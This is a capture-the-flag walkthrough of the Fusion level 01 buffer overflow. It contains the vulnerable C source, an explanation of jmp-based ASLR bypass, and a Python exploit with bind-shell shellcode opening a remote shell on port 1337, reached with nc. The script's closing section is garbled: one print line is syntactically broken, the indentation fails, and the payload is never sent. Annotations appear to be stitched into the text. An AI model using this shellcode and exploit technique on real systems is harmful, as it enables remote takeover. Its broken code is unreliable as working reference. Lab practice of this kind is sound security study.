
Exploit Exercise Binary Exploitation Fusion Level 01

Hello Friends,

Welcome again. Today I am going to share another walkthrough of mine, Exploit Exercises Fusion level 01. Basically, this level is a complete copy of the previous level; the only difference is that ASLR (Address Space Layout Randomization) is enabled. Don't forget to check Exploit Exercises Fusion level 00.

So, let's start.


This is a simple introduction to get you warmed up.
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path 'resolved' buffer might be a bad idea due to character restrictions due to realpath(). Instead, there is plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"

int fix_path(char *path)
{
  char resolved[128];

  // realpath() writes the canonical path into a fixed 128-byte stack buffer;
  // a long resolved path overruns it (this is the level's bug)
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
  return 0;
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);   // as in the level source; this call is what reaches the overflow

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT);
  set_io(fd);                 // from common.c: talk to the client over fd (as in the level source)

  p = parse_http_request();   // the listing on this page stops at serve_forever(); the rest is as in the level source
  return 0;
}


Here, our problem is ASLR. Well, after spending my valuable time on research and GDB testing, I found a way to bypass this problem.

Actually, our exact problem here is the random starting address of the injected shellcode. So we just need to point EIP at the start of our shellcode.

Well, our solution is the JMP instruction. Those of you who don't know about it: start googling now. A JMP instruction is a few bytes of instruction that tell EIP to jump from one address to another.

Like, if we want EIP to jump 39 bytes, then our instruction will be

0:  eb 25                   jmp    0x27

Inject it like this (string literal):

'\xeb\x25'

Basically, this instruction tells EIP to jump 39 bytes forward from its current position. Note that the encoded displacement is 0x25 = 37 and is counted from the end of the 2-byte instruction, which is why the disassembler shows the target as 0x27 = 39 relative to the start of the jmp. Simple.
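The encoding behind that eb 25, as an added example (not code from the post): a small Python 3 helper of my own that turns "jump N bytes from the start of the jmp" into the two-byte short-jmp form and back, checks the rel8 range, and flags encodings that would contain a NUL byte, which the strcpy()/realpath() path in this level cuts off. The helper names are assumptions of this example.

```python
# Added example (not from the post): encoding and decoding the two-byte
# short relative jump (opcode 0xEB, rel8) used in the walkthrough.
# The displacement is counted from the END of the 2-byte instruction, so
# "jump 39 bytes from where the jmp starts" is encoded as 39 - 2 = 0x25.

INSN_LEN = 2  # EB <rel8>


def encode_jmp_short(distance_from_insn_start):
    """Return the 2 bytes of a short jmp whose target lies
    `distance_from_insn_start` bytes from the first byte of the jmp.
    Negative values jump backwards."""
    rel8 = distance_from_insn_start - INSN_LEN
    if not -128 <= rel8 <= 127:
        raise ValueError("rel8 out of range: %d (needs the 5-byte E9 form)" % rel8)
    return bytes([0xEB, rel8 & 0xFF])


def decode_jmp_short(code):
    """Inverse: given the 2 bytes, return the distance from the jmp's own
    start to its target (what a disassembler prints for address 0)."""
    if len(code) != INSN_LEN or code[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel8 = code[1] - 256 if code[1] > 127 else code[1]
    return INSN_LEN + rel8


def c_string_safe(code):
    """True if the encoding survives the C-string copies on this path
    (strcpy/realpath stop at a NUL byte). A jump of exactly 2 bytes would
    be EB 00 and is therefore unusable in a NUL-terminated buffer."""
    return 0 not in code


if __name__ == "__main__":
    jmp = encode_jmp_short(39)
    print(jmp.hex(), decode_jmp_short(jmp), c_string_safe(jmp))  # eb25 39 True
```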

Further details are left for you to work out yourself.

Here is my exploit (Python 2: print statements and raw_input).


# import modules
import socket
import struct
import os

# Target Configurations
TARGET_IP = raw_input('[+] Enter Target IP [default] : ') or ''
TARGET_PORT = 20001   # assumption: the port this level listens on (PORT in common.c); adjust for your VM

# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# file descriptor
sf = s.makefile("rw")

# connect
s.connect((TARGET_IP, TARGET_PORT))

# ===================================================================
#   Unsuccessful Payload Created From MSFVENOM (encoded bind shell; it did
#   not work here and is overwritten by the payload actually used below)
# ===================================================================
# cmd
#    msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'

# ================================================================
#     Another Payload (the one actually used): bind TCP shell on port 1337
# ================================================================
# url :

buf  = ''
buf +="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

payload = ''
payload += 'GET '
payload += '\x90'*137 + '\xeb\x25'        # padding (NOP sled) ending in the two-byte short jmp described above

payload += struct.pack("<I", 0x80488b9)   # return address (little-endian)
payload += '/'      # <--- To Stop Realpath function from overwriting return address
payload += '\x90'*200

# ShellCode here
payload += buf
payload += '\x90'*400

payload += ' HTTP/1.1'                    # must follow the path: parse_http_request() checks for it



print "[+] Wait For Response"
 print ['trying to access %s\n')+10)]
 print "[-] If You Are Reading This Message Then Probably Exploit failed."
 input("[-] Exit. Trying Again..")
 print "[+] Starting Bind TCP Shell."
 print "[+] Use Commands Carefully."
 os.system('nc {} 1337'.format(TARGET_IP))

Check Exploit Exercise Fusion level 00

Don't forget to leave an appreciative comment below.
